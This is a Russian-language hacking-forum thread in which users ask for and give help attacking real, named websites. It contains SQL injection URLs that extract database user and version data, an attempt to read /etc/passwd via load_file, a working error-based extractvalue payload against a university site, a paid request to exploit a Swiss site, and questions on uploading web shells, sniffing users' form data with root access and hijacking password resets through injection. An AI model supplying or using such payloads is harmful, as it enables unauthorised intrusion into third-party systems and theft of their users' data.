Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    писал выше. админка заблочена на ип... в том то и проблема
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    покажите файл /wp-admin/.htaccess
    папки в /wp-content/ все попробовали? соседей искали? что за ОС на сервере? что в файле wp-config.php написано? httpd.conf посмотрели?
     
    _________________________
  3. blacksuccess

    blacksuccess New Member

    Joined:
    12 Jan 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    На сайте имеется скрипт, в котором не фильтруется $_POST.

    Такой код:
    if (isset($_POST["name"]))
    {
    echo $_POST["name"];
    exit();
    }

    Можно ли через это залить шелл?
     
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Вероятно, например, если вы поднимете свои права в системе с помощью XSS, а затем появится возможность выполнять произвольный код.
    Вообще, http://php.net/manual/ru/function.echo.php
     
    1 person likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Кто поможет раскрутить, дам 4 wmz, оч надо)
    http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig
    ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"
     
  6. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    5.0.95-log
    http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17+--+
    snowsoc@server
    а теперь хочу узнать привилегии юзера
    и тут завис
    так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.user+where+user='snowsoc'+--+
    ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1
    использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.user+where+user=0x736e6f77736f63
    ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user'
    что эта ошибка значит?

    проверяю через LOAD_FILE('/etc/passwd')
    http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,load_file%280x2f6574632f706173737764%29,12,13,14,15,16,17--+
    выводит страницу сайта и число 10
    это значить что привилегии у пользователя есть?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    если бы были привилегии, вы бы получили в ответе файл /etc/passwd
    ошибка значит, что вы не можете сделать запрос к этой бд, потому что ее нет.
    ознакомтесь со статьей https://forum.antichat.ru/threadnav43966-1-10.html и прежде чем задавать вопрос поищите решение в гугле или поиском по форуму, на этот вопрос отвечали и не раз
     
    _________________________
    #23867 yarbabin, 11 Feb 2015
    Last edited: 11 Feb 2015
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Причем здесь деньги? "вопросы по уязвимостям".
    У вас там CMS TYPO3, посмотрите публик сплоенты.
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Это вознагрождение)
    то что там типо3 я и так знаю
     
  10. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Мне вот интересно, а как крутится эта инъекция:
    Code:
    comingoutspb.com/ru/materialyi-po-proektu?project=[inj]
     
  11. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    error-based, например через updatexml

    XPATH syntax error: ':5.5.41-0+wheezy1'
     
    1 person likes this.
  12. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Есть рутовый суидник на сайте site.com
    Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован.
    Поясню:
    Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    tcpdump
     
    _________________________
    1 person likes this.
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%[email protected]&FE%5Btt_address%5D%5Bname%5D=a'&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=3&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
    Чет вроде скуля не сложная, но немогу раскрутить...
    ЗЫ при правильном вводе, ошибка пропадает, далее меняете [email protected] на другое мыло
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%[email protected]&FE%5Btt_address%5D%5Bname%5D=lol%27and%28extractvalue%281,concat%280x5c,version%28%29%29%29%29=%271&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=%203&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
    XPATH syntax error: '\5.5.38-log'
     
    _________________________
    1 person likes this.
  16. n4yk

    n4yk New Member

    Joined:
    15 Sep 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Need help!

    Имеется уязвимость в скрипте восстановления пароля на почту:

    PHP:
    <?php
    $name
    =$_POST['name'];
    $email=$_POST['email'];
    $sql=mysql_query("select * from users_table where user='$name' and email='$email'");
    $col=mysql_num_rows($sql);
    if(
    $col=='0') { /* вывод ошибки что пользователь не найден */ } else {
    $password=rand_str();
    mysql_query("update users_table set pass='$password' where user='$name' and email='$email'");

    $sql=mysql_query("select * from users_table where user='$name'");
    $row=mysql_fetch_array($sql);
    $email_to_send=$row['email'];

    // --Дальше функция отправки нового пароля на email и вывод сообщения об успешной отправке--

    mail("$email_to_send","$message_with_new_pass","From: [email protected]");

    echo 
    'Message Sended';

    ?>

    При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации.

    Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит.

    Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей.

    Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where.

    Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update?
     
    #23876 n4yk, 18 Feb 2015
    Last edited: 18 Feb 2015
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.gfz-potsdam.de/forschung/ueberblick/departments/department-4/anorganische-und-isotopengeochemie/mitarbeiter/profil/judith-schicks/list/?cHash=dd9ae84d8ccec2384f97ec748975f738&no_cache=1&tx_mkgfzstaffdirectory_normalview%5Bsectionid%5D=18
    Кто подберёт колонки?
     
  18. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    крутите как слепую если нет вывода
     
  19. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие
    подскажите как можно подключиться к ссш чтобы выполнять команды?


    Пробывал по svn через различные клиента , не подключается
     
    #23879 swat_, 19 Feb 2015
    Last edited: 19 Feb 2015
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    а что с 22 портом?
     
Thread Status:
Not open for further replies.